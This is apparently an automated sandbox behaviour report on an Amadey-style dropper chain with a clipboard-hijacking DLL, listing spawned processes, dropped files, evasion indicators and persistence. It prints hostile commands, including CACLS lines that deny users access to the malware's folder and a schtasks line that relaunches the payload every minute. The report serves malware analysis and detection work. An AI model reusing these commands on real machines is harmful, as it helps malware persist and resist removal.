                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&ExitJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, MainJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /EJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /EJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_010C1F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeCode function: 1_2_01091F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_01091F90
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_010C597D
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5576:120:WilError_01
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeMutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:920:120:WilError_01
                          Source: C:\Users\user\Desktop\file.exeCommand line argument: Kernel32.dll0_2_010C2BFB
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeCommand line argument: Kernel32.dll1_2_01092BFB
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCommand line argument: 08A2_2_00413780
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: wextract.pdb source: file.exe, bjAg.exe.0.dr
                          Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.307249151.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 00000008.00000000.443385689.000000000019E000.00000002.00000001.01000000.00000009.sdmp, xriv.exe, 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp, mnolyk.exe, 00000009.00000000.445170122.0000000000DAE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000009.00000002.828007613.0000000000DAE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000015.00000000.451693507.0000000000DAE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000015.00000002.452166128.0000000000DAE000.00000002.00000001.01000000.0000000A.sdmp, xriv.exe.0.dr, mnolyk.exe.8.dr
                          Source: Binary string: Healer.pdb source: ajAf.exe, 00000002.00000002.414760321.0000000002210000.00000004.08000000.00040000.00000000.sdmp, ajAf.exe, 00000002.00000002.414947367.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, ajAf.exe, 00000002.00000002.414637358.0000000001FF0000.00000004.00000020.00020000.00000000.sdmp, ajAf.exe, 00000002.00000002.414918695.00000000025B0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: wextract.pdbGCTL source: file.exe, bjAg.exe.0.dr
                          Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: bjAg.exe, 00000001.00000003.308200379.0000000000D2D000.00000004.00000020.00020000.00000000.sdmp, bjAg.exe, 00000001.00000003.308124851.0000000004873000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 00000007.00000000.415603805.0000000000792000.00000002.00000001.01000000.00000008.sdmp, nika.exe.1.dr
                          Source: Binary string: _.pdb source: ajAf.exe, 00000002.00000002.414760321.0000000002210000.00000004.08000000.00040000.00000000.sdmp, ajAf.exe, 00000002.00000002.414947367.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, ajAf.exe, 00000002.00000002.414637358.0000000001FF0000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: rundll32.exe, 00000014.00000002.827912783.000000006E7EF000.00000002.00000001.01000000.0000000C.sdmp, clip64.dll.9.dr, clip64[1].dll.9.dr
                          Source: Binary string: Healer.pdbH5 source: ajAf.exe, 00000002.00000002.414760321.0000000002210000.00000004.08000000.00040000.00000000.sdmp, ajAf.exe, 00000002.00000002.414947367.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, ajAf.exe, 00000002.00000002.414637358.0000000001FF0000.00000004.00000020.00020000.00000000.sdmp, ajAf.exe, 00000002.00000002.414918695.00000000025B0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\vot.pdb source: bjAg.exe, 00000001.00000003.308124851.000000000485F000.00000004.00000020.00020000.00000000.sdmp, ajAf.exe, 00000002.00000000.308294007.0000000000401000.00000020.00000001.01000000.00000005.sdmp, ajAf.exe.1.dr

                          Data Obfuscation

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeUnpacked PE file: 2.2.ajAf.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeUnpacked PE file: 2.2.ajAf.exe.400000.0.unpack .text:ER;.data:W;.weh:R;.lami:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C724D push ecx; ret 0_2_010C7260
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeCode function: 1_2_0109724D push ecx; ret 1_2_01097260
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_0041C40C push cs; iretd 2_2_0041C4E2
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_00423149 push eax; ret 2_2_00423179
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_0041C50E push cs; iretd 2_2_0041C4E2
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_004231C8 push eax; ret 2_2_00423179
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_0040E21D push ecx; ret 2_2_0040E230
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_0041C6BE push ebx; ret 2_2_0041C6BF
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FDC125 push ebx; ret 2_2_01FDC126
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FCE484 push ecx; ret 2_2_01FCE497
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FDBF75 push cs; iretd 2_2_01FDBF49
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FDBE73 push cs; iretd 2_2_01FDBF49
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_02234139 push edi; iretd 2_2_0223414E
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_0223454E push ecx; retf 2_2_02234554
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_00187D26 push ecx; ret 8_2_00187D39
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_0017F748 push E8FFFFFBh; iretd 8_2_0017F74D
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_010C2F1D
                          Source: nika.exe.1.drStatic PE information: 0xE382D401 [Fri Dec 15 06:19:45 2090 UTC]
                          Source: ajAf.exe.1.drStatic PE information: section name: .weh
                          Source: ajAf.exe.1.drStatic PE information: section name: .lami

                          Persistence and Installation Behavior

                          barindex
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 00000009.00000002.827863468.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000002.827863468.00000000009FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000003.581791427.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000002.827863468.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000003.581742963.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000003.581742963.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000002.827863468.0000000000A39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeFile created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeFile created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_010C1AE8
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeCode function: 1_2_01091AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_01091AE8

                          Boot Survival

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe TID: 5132Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe TID: 5848Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5784Thread sleep count: 171 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5784Thread sleep time: -5130000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5316Thread sleep time: -50000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5912Thread sleep count: 39 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 4948Thread sleep count: 38 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 4948Thread sleep time: -6840000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5784Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exe TID: 2540Thread sleep count: 166 > 30Jump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exe TID: 2540Thread sleep time: -166000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-26001
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-25741
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 180000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-2575
                          Source: C:\Users\user\Desktop\file.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2569
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeAPI coverage: 6.1 %
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 50000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 180000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeAPI call chain: ExitProcess graph end nodegraph_2-26003
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C5467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_010C5467
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_010C2390
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeCode function: 1_2_01092390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_01092390
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_0018FC58 FindFirstFileExW,8_2_0018FC58
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_010C2F1D
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FC092B mov eax, dword ptr fs:[00000030h]2_2_01FC092B
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FC0D90 mov eax, dword ptr fs:[00000030h]2_2_01FC0D90
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_0018A9A1 mov eax, dword ptr fs:[00000030h]8_2_0018A9A1
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_0018CFB2 mov eax, dword ptr fs:[00000030h]8_2_0018CFB2
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_0040ADB0 GetProcessHeap,HeapFree,2_2_0040ADB0
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeMemory allocated: page read and write | page guardJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C6F40 SetUnhandledExceptionFilter,0_2_010C6F40
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_010C6CF0
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeCode function: 1_2_01096F40 SetUnhandledExceptionFilter,1_2_01096F40
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeCode function: 1_2_01096CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_01096CF0
